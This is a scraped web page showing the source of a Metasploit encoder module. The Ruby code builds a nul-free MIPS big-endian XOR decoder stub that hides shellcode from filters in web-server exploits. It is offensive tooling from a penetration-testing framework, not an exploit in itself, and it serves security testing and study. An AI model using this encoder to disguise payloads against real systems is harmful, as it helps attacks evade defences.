Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/mipsbe/longxor.rb
Views: 11779
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasm'67class MetasploitModule < Msf::Encoder::Xor89def initialize10super(11'Name' => 'XOR Encoder',12'Description' => %q{13Mips Web server exploit friendly xor encoder14},15'Author' =>16[ 'Julien Tinnes <julien[at]cr0.org>', # original shellcode17'Pedro Ribeiro <[email protected]>', # fix Linux >= 2.6.11 and toupper() compat18],19'Arch' => ARCH_MIPSBE,20'License' => MSF_LICENSE,21'Decoder' =>22{23'KeySize' => 4,24'BlockSize' => 4,25'KeyPack' => 'N',26})27end2829#30# Returns the decoder stub that is adjusted for the size of the buffer31# being encoded.32#33def decoder_stub(state)3435# add one xor operation for the key (see comment below)36number_of_passes=state.buf.length/4+137raise EncodingError.new("The payload being encoded is too long (#{state.buf.length} bytes)") if number_of_passes > 1024038raise EncodingError.new("The payload is not padded to 4-bytes (#{state.buf.length} bytes)") if state.buf.length%4 != 03940# 16-bits not (again, see below)41reg_10 = (number_of_passes+1)^0xFFFF42reg_5 = state.buf.length^0xFFFF43decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:big), <<EOS).encoded.data44;45; MIPS nul-free xor decoder46;47; (C) 2006 Julien TINNES48; <julien at cr0.org>49;50; The first four bytes in encoded shellcode must be the xor key51; This means that you have to put the xor key right after52; this xor decoder53; This key will be considered part of the encoded shellcode54; by this decoder and will be xored, thus becoming 4NULs, meaning nop55;56; This is Linux-only because I use the cacheflush system call57;58; You can use shellforge to assemble this, but be sure to discard all59; the nul bytes at the end (everything after x01\\x4a\\x54\\x0c)60;61; change 2 bytes in the first instruction's opcode with the number of passes62; the number of passes is the number of xor operations to apply, which should be63; 1 (for the key) + the number of 4-bytes words you have in your shellcode64; you must encode ~(number_of_passes + 1) (to ensure that you're nul-free)656667;.text68;.align 269;.globl main70;.ent main71;.type main,@function7273main:7475li macro reg, imm76; lui reg, ((imm) >> 16) & 0ffffh77; ori reg, reg, (imm) & 0ffffh78addiu reg, $0, imm ; sufficient if imm.abs <= 0x7fff79endm8081li( $10, #{reg_10}) ; load number of passes ^ 0xffff82nor $10, $10, $0 ; put number of passes in $108384li( $11,-89) ; addend to calculated PC is 7385;.set noreorder86next:87bltzal $8, next88;.set reorder89slti $8, $0, 0x828290nor $11, $11, $0 ; addend in $991addu $25, $31, $11 ; $25 points to encoded shellcode +492addu $16, $31, $11 ; $16 too (used to set up the cacheflush() arg down below)9394; lui $2, 0xDDDD ; first part of the xor (old method)95slti $23, $0, 0x8282 ; store 0 in $23 (our counter)96; ori $17, $2, 0xDDDD ; second part of the xor (old method)97lw $17, -4($25) ; load xor key in $179899100li( $9, -5)101nor $9, $9, $0 ; 4 in $9102103addi $15, $9, -3 ; 1 in $15104loop:105lw $8, -4($25)106107addu $23, $23, $15 ; increment counter108xor $3, $8, $17109sltu $30, $23, $10 ; enough loops?110sw $3, -4($25)111addi $6, $9, -1 ; 3 in $6 (for cacheflush)112bne $0, $30, loop113addu $25, $25, $9 ; next instruction to decode :)114115116addiu $4, $16, -4 ; cacheflush() addr parameter117li( $10,#{reg_5}) ; cacheflush() nbytes parameter118nor $5, $10, $0 ; same as above119; li $6,3 ; $6 is set above, 3rd arg for cacheflush()120121; .set noreorder122li( $2, 4147) ; cacheflush123; .ascii "\\x01JT\\x0c" ; nul-free syscall124syscall 0x52950125; .set reorder126127128; write last decoder opcode and decoded shellcode129; li $4,1 ; stdout130; addi $5, $16, -8131; li $6,40 ; how much to write132; .set noreorder133; li $2, 4004 ; write134; syscall135; .set reorder136137138nop ; encoded shellcoded must be here (xor key right here ;)139; $t9 (aka $25) points here140141EOS142# put the key at the end of the decoder143state.decoder_key_offset = decoder.length - 4144145return decoder146end147end148149150